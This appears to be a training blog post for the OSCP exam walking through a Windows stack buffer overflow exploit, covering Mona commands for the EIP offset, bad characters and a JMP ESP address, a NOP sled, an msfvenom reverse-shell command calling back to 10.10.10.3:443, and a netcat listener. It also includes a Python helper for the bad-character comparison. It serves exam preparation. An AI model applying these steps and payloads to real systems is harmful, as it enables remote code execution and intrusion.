In this short article, I would like to describe the main steps in the simplest terms and give a brief overview of how a stack buffer overflow exploit is built. You should be ready to solve this type of task for the OSCP exam.
What you will have to work with during this task:
- Python exploit code
- Immunity debugger
- Mona for Immunity debugger
Main steps:
- Connection to the debugging machine
- Fuzzing (skipped for OSCP)
- Identifying the EIP register offset value
- Controlling the EIP value
- Identifying the bad character
- Identifying the returning address
- Adding padding
- Generating a reverse shell with msfvenom
- Getting a shell
Steps overview:
1) Connection to the debugging machine
xfreerdp +clipboard /u:USERNAME /p:PASSWORD /cert:ignore /v:MACHINE_IP /workarea
3) Identifying the EIP register offset value
Note: generate a cyclic pattern 400 bytes longer than the string that crashed the server: VALUE = CRASH + 400
locate pattern_create.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l VALUE
Set up the Mona working folder:
!mona config -set workingfolder c:\mona\%p
Find the EIP offset:
!mona findmsp -distance VALUE
(screenshot: Mona result)
Use the offset that Mona reports as the offset value in the exploit.
4) Controlling the EIP value
Set "BBBB" as the retn value, crash the server again, then check the EIP register value.
(screenshot: exploit code)
(screenshot: result)
5) Identifying the bad characters
Note: \x00 is a bad character by default. Use the following string as the payload for identifying the bad characters.
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
(screenshot: exploit code)
Set up the Mona bytearray, excluding \x00:
!mona bytearray -b "\x00"
Take the ESP register value after the crash (shown in the debugger) and compare the memory at that address with the bytearray file:
!mona compare -f C:\mona\oscp\bytearray.bin -a ESP_ADDRESS
Remove the reported bad character from the payload string, crash the server again, and add the removed character to the Mona bytearray:
!mona bytearray -b "\x00\x07"
After the crash, compare the Mona bytearray with the memory at the ESP address again.
(screenshot: removing the character)
Note: remove the possible bad characters one at a time, because a bad character can corrupt or truncate everything that follows it, so only the first mismatch in each comparison is reliable. At the end you will have the full list of bad characters, for example "\x00\x07\x2e\xa0".
6) Identifying the return address
!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"
In this example Mona returns the address 0x625011af.
Convert the return address to little-endian byte order so that it can be used in the Python code:
0x625011af → \xaf\x11\x50\x62
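The comparison that Mona performs in step 5 and the address conversion from step 6, written out as a small added Python example (this is not the article's exploit code and not Mona's implementation; the `observed` bytes in the demo are constructed to simulate a crash in which the target alters \x07 in memory):

```python
import struct

def badchar_payload(excluded=(0x00,)):
    """Bytes 0x01..0xff minus those already known to be bad.
    This is the string sent in step 5 (what `!mona bytearray -b` produces)."""
    return bytes(b for b in range(1, 256) if b not in excluded)

def find_first_bad_char(sent, observed):
    """Step 5 comparison: walk the sent array against the bytes read from
    memory at ESP after the crash. Returns the first sent byte that is
    missing or altered in memory, or None if everything arrived intact.
    Only the first hit is reliable, because a bad character can corrupt
    or truncate everything after it; remove it, crash again, repeat."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None

def format_badchars(chars):
    """Render a bad-character list in the \\xNN form the article passes
    to `!mona bytearray -b`, `!mona jmp -cpb` and `msfvenom -b`."""
    return "".join(f"\\x{c:02x}" for c in chars)

def pack_ret(addr):
    """Step 6: encode a 32-bit return address little-endian for the exploit,
    e.g. 0x625011af -> \\xaf\\x11\\x50\\x62."""
    return struct.pack("<I", addr)

if __name__ == "__main__":
    bad = [0x00]
    sent = badchar_payload(bad)
    # Constructed memory dump for the demo: the target mangles \x07 into \x0a.
    observed = sent.replace(b"\x07", b"\x0a")
    while (hit := find_first_bad_char(sent, observed)) is not None:
        bad.append(hit)
        sent = badchar_payload(bad)
        observed = sent.replace(b"\x07", b"\x0a")  # same simulated behaviour
    print("bad chars:", format_badchars(bad))   # \x00\x07
    print("retn:", pack_ret(0x625011af))        # b'\xaf\x11\x50\x62'
```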
7) Adding padding
padding = b"\x90" * 16
8) Generating a reverse shell with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT EXITFUNC=thread -b "BAD_CHAR" -f python -v payload
Example:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.3 LPORT=443 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f python -v payload
Paste the generated payload variable into the final exploit.
9) Getting a shell
Start a netcat listener on the port used in the payload:
sudo nc -lvnp 443
Run the exploit and catch the shell.
Follow me and stay secure!